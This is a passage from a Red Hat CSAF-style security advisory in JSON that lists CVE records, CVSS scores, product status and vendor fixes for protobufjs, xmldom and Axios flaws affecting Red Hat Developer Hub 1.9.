          "url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.5"
        },
        {
          "category": "external",
          "summary": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1",
          "url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.1"
        },
        {
          "category": "external",
          "summary": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg",
          "url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-xq3m-2v4x-88gg"
        }
      ],
      "release_date": "2026-04-18T16:18:10.652000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "protobufjs: protobufjs: Arbitrary code execution via injected protobuf definition type fields"
    },
    {
      "cve": "CVE-2026-41672",
      "cwe": {
        "id": "CWE-91",
        "name": "XML Injection (aka Blind XPath Injection)"
      },
      "discovery_date": "2026-05-07T05:02:05.372643+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2467631"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in xmldom and @xmldom/xmldom, a JavaScript module for parsing and serializing XML. This vulnerability allows an attacker to inject malicious content into XML comments. By doing so, the attacker can prematurely close a comment and insert unauthorized XML elements into the final output. This could lead to the manipulation of data within the XML document.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "xmldom: @xmldom/xmldom: xmldom: Arbitrary XML Node Injection",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-41672"
        },
        {
          "category": "external",
          "summary": "RHBZ#2467631",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467631"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-41672",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41672"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41672",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41672"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7",
          "url": "https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1",
          "url": "https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/pull/987",
          "url": "https://github.com/xmldom/xmldom/pull/987"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.8.13",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.9.10",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8",
          "url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8"
        }
      ],
      "release_date": "2026-05-07T03:36:16.914000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "xmldom: @xmldom/xmldom: xmldom: Arbitrary XML Node Injection"
    },
    {
      "cve": "CVE-2026-41673",
      "cwe": {
        "id": "CWE-776",
        "name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
      },
      "discovery_date": "2026-05-07T05:02:01.500444+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2467630"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the `xmldom` library, a JavaScript module for parsing XML documents. An attacker could exploit this vulnerability by providing a specially crafted, deeply nested XML document. This could lead to a Denial of Service (DoS) by causing the application to crash due to excessive recursion.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "@xmldom/xmldom: xmldom: xmldom: Denial of Service via deeply nested XML documents",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-41673"
        },
        {
          "category": "external",
          "summary": "RHBZ#2467630",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467630"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-41673",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41673"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41673",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41673"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa",
          "url": "https://github.com/xmldom/xmldom/commit/17678a2a73ecbd1a2da90f3d47dc23da9cef81aa"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597",
          "url": "https://github.com/xmldom/xmldom/commit/291257493cb0eb6980eda83b162a9c4e6d7d2597"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f",
          "url": "https://github.com/xmldom/xmldom/commit/2d6d6916ed8a4c223db1f6d7560ab4544c465b0f"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a",
          "url": "https://github.com/xmldom/xmldom/commit/430357c7b6333108856e917bf2367afe5ceb6f8a"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe",
          "url": "https://github.com/xmldom/xmldom/commit/4845ef109221df0890825de2822fbe77afba3afe"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3",
          "url": "https://github.com/xmldom/xmldom/commit/8834218c85ac2a4d757b9587c9028e67c2f7b6c3"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112",
          "url": "https://github.com/xmldom/xmldom/commit/8b7cfd1491314abdc347261921d7334ff15f7112"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb",
          "url": "https://github.com/xmldom/xmldom/commit/b0620383abc1df067f3ce1014c43ae1bc1161eeb"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84",
          "url": "https://github.com/xmldom/xmldom/commit/e6edcab6bef5bcdba0b220bb35442aa72f452b84"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.8.13",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.9.10",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw",
          "url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw"
        }
      ],
      "release_date": "2026-05-07T03:40:28.378000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "@xmldom/xmldom: xmldom: xmldom: Denial of Service via deeply nested XML documents"
    },
    {
      "cve": "CVE-2026-41674",
      "cwe": {
        "id": "CWE-91",
        "name": "XML Injection (aka Blind XPath Injection)"
      },
      "discovery_date": "2026-05-07T05:01:25.803044+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2467620"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in xmldom and @xmldom/xmldom, a JavaScript library for parsing and serializing XML. This vulnerability allows an attacker to inject arbitrary XML markup into a document due to improper handling of DocumentType node fields during serialization. By crafting malicious input, an attacker can cause the XML serializer to prematurely terminate the DOCTYPE declaration, enabling the insertion of unauthorized content. This could lead to information disclosure or, in certain configurations, the execution of arbitrary code.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "xmldom: xmldom: Arbitrary XML markup injection",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-41674"
        },
        {
          "category": "external",
          "summary": "RHBZ#2467620",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467620"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-41674",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41674"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41674",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41674"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314",
          "url": "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.8.13",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.9.10",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h",
          "url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h"
        }
      ],
      "release_date": "2026-05-07T03:47:51.140000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "xmldom: xmldom: Arbitrary XML markup injection"
    },
    {
      "cve": "CVE-2026-41675",
      "cwe": {
        "id": "CWE-91",
        "name": "XML Injection (aka Blind XPath Injection)"
      },
      "discovery_date": "2026-05-07T05:01:58.399809+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2467629"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in xmldom. A remote attacker can exploit this vulnerability by providing specially crafted processing instruction data. Due to improper validation of the processing instruction closing sequence, the attacker can terminate the instruction prematurely and inject arbitrary XML nodes into the serialized output. This can lead to data manipulation and integrity issues within applications that process the affected XML.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "xmldom: xmldom: Arbitrary XML node injection via crafted processing instructions",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-41675"
        },
        {
          "category": "external",
          "summary": "RHBZ#2467629",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467629"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-41675",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41675"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41675",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41675"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2",
          "url": "https://github.com/xmldom/xmldom/commit/7207a4b0e0bcc228868075ed991665ef9f73b1c2"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.8.13",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/releases/tag/0.9.10",
          "url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
        },
        {
          "category": "external",
          "summary": "https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx",
          "url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx"
        }
      ],
      "release_date": "2026-05-07T03:49:34.056000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "xmldom: xmldom: Arbitrary XML node injection via crafted processing instructions"
    },
    {
      "cve": "CVE-2026-42033",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:20.937507+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461607"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
